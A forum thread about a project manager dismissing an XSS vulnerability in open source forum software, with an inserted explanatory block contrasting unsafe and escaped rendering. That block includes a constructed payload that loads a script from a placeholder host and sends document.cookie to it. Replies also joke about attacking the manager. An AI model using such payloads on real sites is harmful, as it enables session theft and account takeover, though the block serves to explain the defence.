Project Managers
-
Take an open source project. Take an XSS vulnerability that isn't hard to make happen with a pinch of social engineering.
Said XSS applies in an environment where privileged accounts are already the current situation and allow any unsanitised JavaScript to be run that you feel like running. Like, say, snarfing all the cookies and sending them off to a third party. Or for that matter, just grabbing a third party script and having that run under the current user's credentials.
There are two vectors for this. Both situations were described in detail and relayed to the appropriate team.
Project manager dismisses this as a 'silly issue'. Mind you, said project manager also dismisses my comments as doom-mongering in general.
Said open source project is 'proud of its security record'.
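The two vectors in the post above boil down to one rendering defect: user text reaching the page unescaped. The block below is an added example, not code from the original thread or from the forum project it discusses. It puts a naive post renderer that splices raw user text into HTML beside a hardened one that escapes at the insertion point, and runs a constructed payload (placeholder host name `third-party.example`, made-up function names `renderPostUnsafe`, `renderPostSafe`, `leaksMarkup`) through both. It runs under Node with no browser; the "page" is just a string.

```javascript
// Added example, not code from the original thread or from the forum project
// it discusses: a naive post renderer that splices raw user text into HTML,
// beside a hardened one that escapes it. Runs under Node; the "page" is a string.

// Constructed payload, modelled on the two vectors named in the thread: load a
// third-party script so it runs with the viewing user's session, and read
// document.cookie and ship it off. The host name is a placeholder, not a real site.
const CONSTRUCTED_PAYLOAD =
  'Nice post! <script src="https://third-party.example/snarf.js"></script>' +
  '<img src=x onerror="(new Image).src=\'https://third-party.example/c?\'+document.cookie">';

// Tags the post template itself emits; anything else in the output came from user input.
const TEMPLATE_TAGS = new Set(['article', 'b', 'div']);

// Vulnerable: user-controlled text is concatenated straight into markup.
function renderPostUnsafe(author, body) {
  return `<article class="post"><b>${author}</b>` +
         `<div class="body">${body}</div></article>`;
}

// Minimal escaping for an HTML text node or a double-quoted attribute value.
// It does not make text safe inside <script>, a URL, or CSS; those need their own encoders.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: same template, every user-supplied value escaped at the point of insertion.
function renderPostSafe(author, body) {
  return `<article class="post"><b>${escapeHtml(author)}</b>` +
         `<div class="body">${escapeHtml(body)}</div></article>`;
}

// Lists the tag names a browser would see in the markup (start and end tags).
// Good enough for the demo; a real audit would run the output through an HTML parser.
function tagNames(html) {
  return Array.from(html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9]*)/g), (m) => m[1].toLowerCase());
}

// True when user input managed to introduce a tag the template did not emit.
function leaksMarkup(html) {
  return tagNames(html).some((name) => !TEMPLATE_TAGS.has(name));
}

function demo() {
  const unsafe = renderPostUnsafe('alice', CONSTRUCTED_PAYLOAD);
  const safe = renderPostSafe('alice', CONSTRUCTED_PAYLOAD);
  console.log('unsafe leaks markup:', leaksMarkup(unsafe), tagNames(unsafe));
  console.log('safe leaks markup:  ', leaksMarkup(safe), tagNames(safe));
  return { unsafe, safe };
}

demo();
```

One caveat worth keeping in mind when a project dismisses the cookie-theft vector: marking the session cookie HttpOnly blocks the `document.cookie` read, but not the second vector. A script pulled into the page still has the user's cookies attached to every request it makes, so it can act as the privileged user without ever seeing the cookie value. Escaping at the output point, together with a Content-Security-Policy that forbids inline script and arbitrary external script sources, addresses both.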
-
Is it a forum software, by any chance?
Also, IT'S OPEN SOURCE FIX IT YOURSELF... oh wait.
-
It might be a forum software.
And I could fix it in the in-dev build but that doesn't help for the existing production installs.
Did I mention, last week they pushed out the last maintenance edition which they're still not running on their own site (it's non-security related), and they're not able to upgrade to that last maintenance edition because the last update was botched... back in January?
And they wonder why I'm full of doom for them.
-
And they wonder why I'm full of doom for them.
You know, as well as I do, that it has to be done...
https://www.youtube.com/watch?v=LaEYYHsSn9o
Filed under: Taking one for the team
-
So perform an unannounced demonstration. On the program manager.
Filed Under: we need a new tag cloud to attack
-
I thought about that, but I don't want to do it by abusing regular users or displacing trust in the platform any more than I have to.
-
Said open source project is 'proud of its security record'.
Not Zamfoo or openssl then...
-
No. It is a place where I am, regrettably, a minor celebrity and former team member until I refused to put up with their bullshit. TRWTF is that I rejoined and tried to work with them and even 4 years later they're still retarded.
-
`window.open('mailto:test@example.com?subject=subject&body=I_The_Project_Manager_Who_Shall_Not_Be_Respected_Resign_this_Day_Because_I_Ignored_A_Vulnerability_That_Prompted_This_Email_To_You_My_Credentials_Are_-Credentials-_And_They_Can_Be_Used_By_Whoever');`
On an unrelated note, apparently doing an underscore, dash, text, dash, underscore, text results in text formatting from the last underscore.
@sam Can we have an option that is just 'Disable all markdown, all html, all types of text parsing, and just let me type text' option / checkbox in a post itself?
-
Can we have an option that is just 'Disable all markdown, all html, all types of text parsing, and just let me type text' option / checkbox in a post itself?
Personally, I'd like to see "raw" concept extended to the whole page.
Filed under: you'd even be able to search it using SSDS!
-
We don't call them project manglers for nothing.
-
Isn't that why we have the backtick for code formatting?
-
dismisses my comments as doom-mongering in general.
You DO sound like a miserable bastard
-
Doesn't change the fact that I'm fucking right about the doom in question. Shit's been going wrong for the last 5 years, and literally nothing has changed about the situation. The same problems are present, the same broken mindsets, it's only the names posting the regurgitated BS that have changed.
-
The obvious solution is to sic metasploit at them. If every script kiddie's favorite toy can exploit the issue then they might care.
-
It does require a little more finesse than that. It can't just be exploited with any old tool, it does require some social engineering - but not a lot. The best part is that it would be abusing a 'trusted resource site' in the process.
-
Personally, I'd like to see "raw" concept extended to the whole page.
I am not in agreement with you here. That would be a terrible torment on the eyes.
-
Doesn't change the fact that I'm fucking right about the doom in question. Shit's been going wrong for the last 5 years, and literally nothing has changed about the situation. The same problems are present, the same broken mindsets, it's only the names posting the regurgitated BS that have changed.
I was joking, fella! Had hoped the smiley would show that... open source: just. say. no.
-
Oh, that's the thing... I DO sound like a miserable bastard because this open source project has been a large part of what I've done over the last few years and it's messed with my head on too many occasions.
Yes, I have been a doom-monger. But it doesn't change the fact I'm right about it.
-
Yes, I have been a doom-monger. But it doesn't change the fact I'm right about it.
The standard term for that is “Cassandra”.